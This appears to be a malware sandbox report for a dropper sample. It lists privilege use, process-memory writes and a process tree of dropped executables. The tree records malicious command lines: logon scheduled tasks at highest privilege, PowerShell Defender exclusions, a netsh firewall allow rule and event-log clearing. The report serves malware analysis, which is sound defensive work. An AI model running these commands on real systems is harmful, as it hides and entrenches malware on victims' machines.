description pid Process Token: SeDebugPrivilege 3044 taskmgr.exe Token: SeSystemProfilePrivilege 3044 taskmgr.exe Token: SeCreateGlobalPrivilege 3044 taskmgr.exe Token: SeDebugPrivilege 564 4363463463464363463463463.exe Token: SeDebugPrivilege 1508 New Text Document mod.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 4832 dialer.exe Token: SeShutdownPrivilege 1980 powercfg.exe Token: SeCreatePagefilePrivilege 1980 powercfg.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeShutdownPrivilege 2060 powercfg.exe Token: SeCreatePagefilePrivilege 2060 powercfg.exe Token: SeShutdownPrivilege 1240 powercfg.exe Token: SeCreatePagefilePrivilege 1240 powercfg.exe Token: SeShutdownPrivilege 3996 powercfg.exe Token: SeCreatePagefilePrivilege 3996 powercfg.exe Token: SeShutdownPrivilege 3268 Explorer.EXE Token: SeCreatePagefilePrivilege 3268 Explorer.EXE Token: SeShutdownPrivilege 3268 Explorer.EXE Token: SeCreatePagefilePrivilege 3268 Explorer.EXE Token: SeIncreaseQuotaPrivilege 5044 powershell.exe Token: SeSecurityPrivilege 5044 powershell.exe Token: SeTakeOwnershipPrivilege 5044 powershell.exe Token: SeLoadDriverPrivilege 5044 powershell.exe Token: SeSystemProfilePrivilege 5044 powershell.exe Token: SeSystemtimePrivilege 5044 powershell.exe Token: SeProfSingleProcessPrivilege 5044 powershell.exe Token: SeIncBasePriorityPrivilege 5044 powershell.exe Token: SeCreatePagefilePrivilege 5044 powershell.exe Token: SeBackupPrivilege 5044 powershell.exe Token: SeRestorePrivilege 5044 powershell.exe Token: SeShutdownPrivilege 5044 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeSystemEnvironmentPrivilege 5044 powershell.exe Token: SeRemoteShutdownPrivilege 5044 powershell.exe Token: SeUndockPrivilege 5044 powershell.exe Token: SeManageVolumePrivilege 5044 powershell.exe Token: 33 5044 powershell.exe Token: 34 5044 powershell.exe Token: 35 5044 powershell.exe Token: 36 5044 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2640 svchost.exe Token: SeIncreaseQuotaPrivilege 2640 svchost.exe Token: SeSecurityPrivilege 2640 svchost.exe Token: SeTakeOwnershipPrivilege 2640 svchost.exe Token: SeLoadDriverPrivilege 2640 svchost.exe Token: SeSystemtimePrivilege 2640 svchost.exe Token: SeBackupPrivilege 2640 svchost.exe Token: SeRestorePrivilege 2640 svchost.exe Token: SeShutdownPrivilege 2640 svchost.exe Token: SeSystemEnvironmentPrivilege 2640 svchost.exe Token: SeUndockPrivilege 2640 svchost.exe Token: SeManageVolumePrivilege 2640 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2640 svchost.exe Token: SeIncreaseQuotaPrivilege 2640 svchost.exe Token: SeSecurityPrivilege 2640 svchost.exe Token: SeTakeOwnershipPrivilege 2640 svchost.exe Token: SeLoadDriverPrivilege 2640 svchost.exe Token: SeSystemtimePrivilege 2640 svchost.exe Token: SeBackupPrivilege 2640 svchost.exe Token: SeRestorePrivilege 2640 svchost.exe Token: SeShutdownPrivilege 2640 svchost.exe Token: SeSystemEnvironmentPrivilege 2640 svchost.exe Token: SeUndockPrivilege 2640 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe -
Suspicious use of SetWindowsHookEx 26 IoCs
pid Process 4588 firefox.exe 3268 Explorer.EXE 3268 Explorer.EXE 5176 firefox.exe 3268 Explorer.EXE 3268 Explorer.EXE 8960 Conhost.exe 3268 Explorer.EXE 3268 Explorer.EXE 6696 exacag.exe 3268 Explorer.EXE 3268 Explorer.EXE 9836 CPDB.exe 13720 Conhost.exe 14292 InstallUtil.exe 9308 Conhost.exe 14500 Conhost.exe 14528 Conhost.exe 10848 Conhost.exe 3268 Explorer.EXE 14248 1.exe 6860 svchost.exe 3268 Explorer.EXE 6660 InstallUtil.exe 3268 Explorer.EXE 6664 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1508 wrote to memory of 4528 1508 New Text Document mod.exe 96 PID 1508 wrote to memory of 4528 1508 New Text Document mod.exe 96 PID 1508 wrote to memory of 1116 1508 New Text Document mod.exe 97 PID 1508 wrote to memory of 1116 1508 New Text Document mod.exe 97 PID 1508 wrote to memory of 832 1508 New Text Document mod.exe 98 PID 1508 wrote to memory of 832 1508 New Text Document mod.exe 98 PID 1508 wrote to memory of 3412 1508 New Text Document mod.exe 100 PID 1508 wrote to memory of 3412 1508 New Text Document mod.exe 100 PID 1508 wrote to memory of 4752 1508 New Text Document mod.exe 101 PID 1508 wrote to memory of 4752 1508 New Text Document mod.exe 101 PID 1508 wrote to memory of 380 1508 New Text Document mod.exe 102 PID 1508 wrote to memory of 380 1508 New Text Document mod.exe 102 PID 1044 wrote to memory of 3988 1044 cmd.exe 108 PID 1044 wrote to memory of 3988 1044 cmd.exe 108 PID 1044 wrote to memory of 3088 1044 cmd.exe 109 PID 1044 wrote to memory of 3088 1044 cmd.exe 109 PID 1044 wrote to memory of 5000 1044 cmd.exe 110 PID 1044 wrote to memory of 5000 1044 cmd.exe 110 PID 1044 wrote to memory of 3576 1044 cmd.exe 111 PID 1044 wrote to memory of 3576 1044 cmd.exe 111 PID 1044 wrote to memory of 1404 1044 cmd.exe 112 PID 1044 wrote to memory of 1404 1044 cmd.exe 112 PID 4528 wrote to memory of 4832 4528 DevMI.exe 115 PID 4152 wrote to memory of 1980 4152 cmd.exe 118 PID 4152 wrote to memory of 1980 4152 cmd.exe 118 PID 4152 wrote to memory of 2060 4152 cmd.exe 119 PID 4152 wrote to memory of 2060 4152 cmd.exe 119 PID 4152 wrote to memory of 1240 4152 cmd.exe 120 PID 4152 wrote to memory of 1240 4152 cmd.exe 120 PID 4152 wrote to memory of 3996 4152 cmd.exe 121 PID 4152 wrote to memory of 3996 4152 cmd.exe 121 PID 4832 wrote to memory of 632 4832 dialer.exe 5 PID 4832 wrote to memory of 684 4832 dialer.exe 7 PID 4832 wrote to memory of 992 4832 dialer.exe 12 PID 4832 wrote to memory of 556 4832 dialer.exe 13 PID 4832 wrote to memory of 720 4832 dialer.exe 14 PID 4832 wrote to memory of 1064 4832 dialer.exe 16 PID 4832 wrote to memory of 1084 4832 dialer.exe 17 PID 4832 wrote to memory of 1136 4832 dialer.exe 18 PID 4832 wrote to memory of 1212 4832 dialer.exe 20 PID 4832 wrote to memory of 1228 4832 dialer.exe 21 PID 4832 wrote to memory of 1300 4832 dialer.exe 22 PID 4832 wrote to memory of 1436 4832 dialer.exe 23 PID 4832 wrote to memory of 1448 4832 dialer.exe 24 PID 4832 wrote to memory of 1468 4832 dialer.exe 25 PID 4832 wrote to memory of 1592 4832 dialer.exe 26 PID 4832 wrote to memory of 1636 4832 dialer.exe 27 PID 4832 wrote to memory of 1656 4832 dialer.exe 28 PID 4832 wrote to memory of 1752 4832 dialer.exe 29 PID 4832 wrote to memory of 1792 4832 dialer.exe 30 PID 4832 wrote to memory of 1844 4832 dialer.exe 31 PID 4832 wrote to memory of 1984 4832 dialer.exe 32 PID 4832 wrote to memory of 2036 4832 dialer.exe 33 PID 4832 wrote to memory of 1036 4832 dialer.exe 34 PID 4832 wrote to memory of 2020 4832 dialer.exe 35 PID 4832 wrote to memory of 1960 4832 dialer.exe 36 PID 4832 wrote to memory of 2124 4832 dialer.exe 37 PID 4832 wrote to memory of 2204 4832 dialer.exe 39 PID 4832 wrote to memory of 2360 4832 dialer.exe 40 PID 4832 wrote to memory of 2464 4832 dialer.exe 41 PID 4832 wrote to memory of 2472 4832 dialer.exe 42 PID 4832 wrote to memory of 2512 4832 dialer.exe 43 PID 4832 wrote to memory of 2552 4832 dialer.exe 44 PID 4832 wrote to memory of 2588 4832 dialer.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 9560 attrib.exe 7176 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:556
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1212 -
C:\Program Files\Google\Chrome\updaters.exe"C:\Program Files\Google\Chrome\updaters.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:5792
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵
- Executes dropped EXE
PID:6852
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:10876
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:4896
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:10380
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:13564
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:6128
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:9116
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:1320
-
-
C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe2⤵PID:10264
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\StUpdate.exeC:\Users\Admin\AppData\Local\Temp/StUpdate.exe2⤵PID:11972
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js"2⤵PID:7612
-
-
C:\ProgramData\Java Update(32bit).exe"C:\ProgramData\Java Update(32bit).exe"2⤵PID:1600
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1300
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1468
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2984
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1960
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2124
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2552
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2588
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3032
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2796
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3268 -
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip2⤵PID:4376
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3044 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /13⤵
- Checks SCSI registry key(s)
PID:9256
-
-
-
C:\Users\Admin\Desktop\mal-1\4363463463464363463463463.exe"C:\Users\Admin\Desktop\mal-1\4363463463464363463463463.exe"2⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:564 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2952
-
-
C:\Users\Admin\Desktop\mal-1\Files\built.exe"C:\Users\Admin\Desktop\mal-1\Files\built.exe"3⤵
- Loads dropped DLL
PID:12196 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\mal-1\Files\built.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:12992
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\Client-built.exe"C:\Users\Admin\Desktop\mal-1\Files\Client-built.exe"3⤵
- Executes dropped EXE
PID:10128 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:10504 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1116
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\XSploitLauncher.exe"C:\Users\Admin\Desktop\mal-1\Files\XSploitLauncher.exe"3⤵
- Executes dropped EXE
PID:14604 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:6860
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\Loader.exe"C:\Users\Admin\Desktop\mal-1\Files\Loader.exe"3⤵
- Executes dropped EXE
PID:12784
-
-
C:\Users\Admin\Desktop\mal-1\Files\first.exe"C:\Users\Admin\Desktop\mal-1\Files\first.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:11428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:9044 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:6664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\mal-1\Files\first.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:8980 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:9804
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\aa.exe"C:\Users\Admin\Desktop\mal-1\Files\aa.exe"3⤵PID:14244
-
-
C:\Users\Admin\Desktop\mal-1\Files\discordupdate.exe"C:\Users\Admin\Desktop\mal-1\Files\discordupdate.exe"3⤵PID:10196
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3432
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"4⤵PID:8648
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:11744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DcU1cPVuAIVV.bat" "5⤵PID:10096
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:5352
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12976
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"6⤵PID:10668
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:7272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2SwbYxgHsSxv.bat" "7⤵PID:7880
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3388
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2484
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"8⤵PID:10752
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:11484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\39sNo12jHame.bat" "9⤵PID:10436
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:12352
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9692
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"10⤵PID:5600
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:12824
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OkJzBrd6BEkL.bat" "11⤵PID:460
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:7332
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11312
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"12⤵PID:7124
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:10616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LQ8bqWs2srjw.bat" "13⤵PID:2696
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3256
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7000
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"14⤵PID:11548
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:10356 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rXnfcWZ5EeBy.bat" "15⤵PID:14912
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:3668
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8340
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"16⤵PID:6480
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:6492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6pRudnWSYxPb.bat" "17⤵PID:6908
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:12796
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2492
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"18⤵PID:5928
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:10120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AiiBYXVaeXtl.bat" "19⤵PID:11544
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:12744
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6236
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"20⤵PID:9016
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:10244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SnlZhOu2q6Sc.bat" "21⤵PID:7216
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:7116
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2244
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\SearchUII.exe"C:\Users\Admin\Desktop\mal-1\Files\SearchUII.exe"3⤵PID:764
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-1\Files\SearchUII.exe" "SearchUII.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:10616
-
-
-
